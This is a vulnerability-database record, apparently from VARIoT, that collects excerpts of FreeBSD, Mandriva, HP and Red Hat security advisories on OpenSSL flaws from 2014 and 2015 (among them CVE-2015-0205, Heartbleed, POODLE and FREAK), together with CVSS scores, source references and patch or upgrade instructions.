"trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6532" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6468" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6457" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6531" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6527" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6493" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6503" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6513" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6515" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6485" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3618" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6466" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6458" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6512" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6504" } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71761" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "131356" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130709" }, { "db": "PACKETSTORM", "id": "130031" }, { "db": "NVD", "id": "CVE-2014-9293" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71761" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "131356" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130709" }, { "db": "PACKETSTORM", "id": "130031" }, { "db": "NVD", "id": "CVE-2014-9293" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-19T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2014-12-19T00:00:00", "db": "BID", "id": "71761" }, { "date": "2014-12-19T00:00:00", "db": "BID", "id": "71762" }, { "date": "2014-12-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "date": "2015-01-05T16:17:48", "db": "PACKETSTORM", "id": "129793" }, { "date": "2015-12-10T17:24:17", "db": "PACKETSTORM", "id": "134756" }, { "date": "2015-04-09T16:21:15", "db": "PACKETSTORM", "id": "131356" }, { "date": "2014-12-23T15:41:03", "db": "PACKETSTORM", "id": "129693" }, { "date": "2014-12-22T17:16:05", "db": "PACKETSTORM", "id": "129684" }, { "date": "2015-03-09T20:18:03", "db": "PACKETSTORM", "id": "130709" }, { "date": "2015-01-20T17:32:22", "db": "PACKETSTORM", "id": "130031" }, { "date": "2014-12-20T02:59:00.053000", "db": "NVD", "id": "CVE-2014-9293" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-27T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2016-10-26T04:13:00", "db": "BID", "id": "71761" }, { "date": "2016-10-26T09:11:00", "db": "BID", "id": "71762" }, { "date": "2017-03-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "date": "2021-11-17T22:15:37.470000", "db": "NVD", "id": "CVE-2014-9293" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "71761" }, { "db": "BID", "id": "71762" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)", "sources": [ { "db": "CERT/CC", "id": "VU#852879" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Input Validation Error", "sources": [ { "db": "BID", "id": "71761" } ], "trust": 0.3 } }
var-201501-0339
Vulnerability from variot
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE) 2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4) 2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16) 2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE) 2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8) 2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE) 2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22) CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572 CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2014-3569] This does not affect FreeBSD's default build. [CVE-2015-0205]
OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. [CVE-2014-3570]
III. [CVE-2015-0206]
A server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]
A server could present a weak temporary key and downgrade the security of the session. This only affects servers which trust a client certificate authority which issues certificates containing DH keys, which is extremely rare. [CVE-2015-0205]
By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r276865 releng/8.4/ r277195 stable/9/ r276865 releng/9.3/ r277195 stable/10/ r276864 releng/10.0/ r277195 releng/10.1/ r277195
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII.
The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition (CVE-2014-0198).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c (CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).
Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import (CVE-2015-0209).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse (CVE-2015-0287).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt
Updated Packages:
Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS kz0ex6eI6hA6qSwklA2NoXY= =GYjX -----END PGP SIGNATURE----- .
Release Date: 2015-07-20 Last Updated: 2015-07-20
Potential Security Impact: Remote Denial of Service (DoS), cross-site request forgery (CSRF), execution of arbitrary code, unauthorized modification, unauthorized access, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Multiple potential security vulnerabilities have been identified with HP System Management Homepage (SMH) on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Denial of Service (DoS), Cross-site Request Forgery (CSRF), execution of arbitrary code, unauthorized modification, unauthorized access, or disclosure of information.
References:
CVE-2014-0118 - Remote Denial of Service (DoS) CVE-2014-0226 - Remote Denial of Service (DoS) CVE-2014-0231 - Remote Denial of Service (DoS) CVE-2014-3523 - Remote Denial of Service (DoS) CVE-2014-3569 - Remote Denial of Service (DoS) CVE-2014-3570 - Remote Disclosure of Information CVE-2014-3571 - Remote Denial of Service (DoS) CVE-2014-3572 - Remote Disclosure of Information CVE-2014-8142 - Remote Code Execution CVE-2014-8275 - Unauthorized Modification CVE-2014-9427 - Remote Disclosure of Information CVE-2014-9652 - Remote Denial of Service (DoS) CVE-2014-9653 - Remote Denial of Service (DoS) CVE-2014-9705 - Remote Code Execution CVE-2015-0204 - Remote Disclosure of Information CVE-2015-0205 - Remote Unauthorized Access CVE-2015-0206 - Remote Denial of Service (DoS) CVE-2015-0207 - Remote Denial of Service (DoS) CVE-2015-0208 - Remote Denial of Service (DoS) CVE-2015-0209 - Remote Denial of Service (DoS) CVE-2015-0231 - Remote Denial of Service (DoS) CVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-0273 - Remote Execution of Arbitrary Code CVE-2015-0285 - Remote Disclosure of Information CVE-2015-0286 - Remote Denial of Service (DoS) CVE-2015-0287 - Remote Denial of Service (DoS) CVE-2015-0288 - Remote Denial of Service (DoS) CVE-2015-0289 - Remote Denial of Service (DoS) CVE-2015-0290 - Remote Denial of Service (DoS) CVE-2015-0291 - Remote Denial of Service (DoS) CVE-2015-0292 - Remote Denial of Service (DoS) CVE-2015-0293 - Remote Denial of Service (DoS) CVE-2015-1787 - Remote Denial of Service (DoS) CVE-2015-2301 - Remote Execution of Arbitrary Code CVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-2348 - Unauthorized Modification CVE-2015-2787 - Remote Execution of Arbitrary Code CVE-2015-2134 - Cross-site Request Forgery (CSRF) SSRT102109
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities for the impacted versions of HP System Management Homepage (SMH).
Please download the latest version of HP System Management Homepage (7.5.0) from the following location:
http://www.hp.com/go/smh
HISTORY Version:1 (rev.1) - 20 July 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
References:
CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2014-3569 CVE-2015-0205 CVE-2014-3508 CVE-2014-3509 CVE-2014-3511 CVE-2014-3513 CVE-2014-3567 CVE-2014-3568 CVE-2016-0705 CVE-2016-0799 CVE-2016-2842 PSRT110092 PSRT110095 CVE-2016-2026 CVE-2016-2027 CVE-2016-2028 CVE-2016-2029 CVE-2016-2030 CVE-2016-4357 CVE-2009-3555 CVE-2016-4358 CVE-2015-3194 CVE-2015-3195 CVE-2015-6565 CVE-2016-2017 CVE-2016-2018 CVE-2016-2019 CVE-2016-2020 CVE-2016-2021 CVE-2016-2022 CVE-2015-7501
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0066-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html Issue date: 2015-01-20 Updated on: 2015-01-21 CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A NULL pointer dereference flaw was found in the DTLS implementation of OpenSSL. A remote attacker could send a specially crafted DTLS message, which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function of OpenSSL parsed certain DTLS messages. A remote attacker could send multiple specially crafted DTLS messages to exhaust all available memory of a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's BigNumber Squaring implementation could produce incorrect results under certain special conditions. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. Note that this issue occurred rarely and with a low probability, and there is currently no known way of exploiting it. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a non-ephemeral key even when the ephemeral ECDH cipher suite was selected. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method than the one requested by the user. (CVE-2014-3572)
It was discovered that OpenSSL would accept ephemeral RSA keys when using non-export RSA cipher suites. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed X.509 certificates. An attacker could use these flaws to modify an X.509 certificate to produce a certificate with a different fingerprint without invalidating its signature, and possibly bypass fingerprint-based blacklisting in applications. (CVE-2014-8275)
It was found that an OpenSSL server would, under certain conditions, accept Diffie-Hellman client certificates without the use of a private key. An attacker could use a user's client certificate to authenticate as that user, without needing the private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to mitigate the above issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
